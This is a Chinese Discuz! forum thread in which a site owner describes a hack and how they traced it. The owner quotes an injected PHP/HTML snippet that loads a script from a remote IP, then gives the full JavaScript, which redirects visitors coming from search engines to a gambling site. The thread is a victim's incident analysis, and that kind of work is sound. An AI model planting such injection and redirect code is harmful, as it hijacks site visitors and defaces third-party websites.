设为首页收藏本站
切换到宽版

Discuz!官方免费开源建站系统

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
Discuz!官方免费开源建站系统»论坛 Discuz! 交流与讨论 Discuz!-安装使用 网址被同行攻击 显示这个
12下一页
返回列表 发新帖

[求助] 网址被同行攻击 显示这个

[复制链接]
吴立峰 发表于 2018-5-10 08:05:09 | 显示全部楼层 |阅读模式
网站被同行攻击了 显示这个 请教从哪里排查恶意代码 这个得为官网 是黑客加上去的 不是我的站名

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有账号?立即注册

x
回复

使用道具 举报

⑧穿内裤 发表于 2018-5-10 09:33:46 | 显示全部楼层
网站被挂马,检查后台设置和文件,修改相关密码
回复

使用道具 举报

mR.耗子 发表于 2018-5-10 09:45:05 | 显示全部楼层
  网站唄挂马~  可以联系我的QQ交谈 完美处理解决~  有偿服务哦~
回复

使用道具 举报

crx349 发表于 2018-5-10 11:21:37 | 显示全部楼层
挂马可以先恢复官方默认文件 然后清理未知文件 做好服务器安全哦
回复

使用道具 举报

迟到的完美 发表于 2018-5-10 16:02:38 | 显示全部楼层
在ftp里边看看你网站文件哪里被修改过。
回复

使用道具 举报

 楼主| 吴立峰 发表于 2018-5-11 08:12:04 | 显示全部楼层
经过检查 发现根目录被黑客放置了一个名为 head的 PHP文件

其内容为:
<title id="title">betvlctor伟德官网|www.betvictor58.com</title>
<script>document.getElementById("title").innerHTML="我的论坛关键字";</script>
<script language="javascript" src="http://103.30.41.50/jh.js"></script>
回复

使用道具 举报

 楼主| 吴立峰 发表于 2018-5-11 08:14:06 | 显示全部楼层
顺藤摸瓜 下载http://103.30.41.50/jh.js之后 发现 其 内容为     




try {
    var urlhash = window.location.hash;
    if (!urlhash.match("fromapp")){
        if ((navigator.userAgent.match(/(iPhone|iPod|Android|ios|iPad)/i))){
            if(window.name != 'ad_app'){
                var r = document.referrer;
                r = r.toLowerCase();
                var aSites = new Array('google.','baidu.','soso.','so.','360.','yahoo.','youdao.','sogou.','gougou.');
                var b = false;
                for (i in aSites){
                    if (r.indexOf(aSites[i]) > 0){
                        b = true;
                        break;
                    }
                }
  
                if(b){
                    self.location = 'http://302193.xjhbet.com';
                    window.adworkergo = 'ad_app';
                }else{
                    location.replace(juhaoyong_mp_site_jump_url);
                }
            }

        }else{
            if(window.name != 'ad_app'){
                var r = document.referrer;
                r = r.toLowerCase();
                var aSites = new Array('google.','baidu.','soso.','so.','360.','yahoo.','youdao.','sogou.','gougou.');
                var b = false;
                for (i in aSites){
                    if (r.indexOf(aSites[i]) > 0){
                    b = true;
                    break;
                    }
                }
  
                if(b){
                    self.location = 'http://302193.xjhbet.com';
                    window.adworkergo = 'ad_app';
                }
            }

        }
    }
}catch(err){
     
}
回复

使用道具 举报

 楼主| 吴立峰 发表于 2018-5-11 08:16:22 | 显示全部楼层
打开其中的   'http://302193.xjhbet.com'  发现是个赌博网站
回复

使用道具 举报

 楼主| 吴立峰 发表于 2018-5-11 08:21:28 | 显示全部楼层
经过和官方文件校对 发现黑客在我的站中 放置了 80多个木马
回复

使用道具 举报

 楼主| 吴立峰 发表于 2018-5-11 08:24:13 | 显示全部楼层
气氛之余 果断致电中国互联网举报中心转人工客服 做一回好公民 然后就是苦逼而又漫长的学习和安全加固之路了
回复

使用道具 举报

下一页 »
12下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

手机版|小黑屋|Discuz! 官方站 ( 皖ICP备16010102号 )star

GMT+8, 2025-2-2 03:40 , Processed in 0.021649 second(s), 4 queries , Gzip On, Redis On.

Powered by Discuz! X3.4

Copyright © 2001-2023, Tencent Cloud.

快速回复 返回顶部 返回列表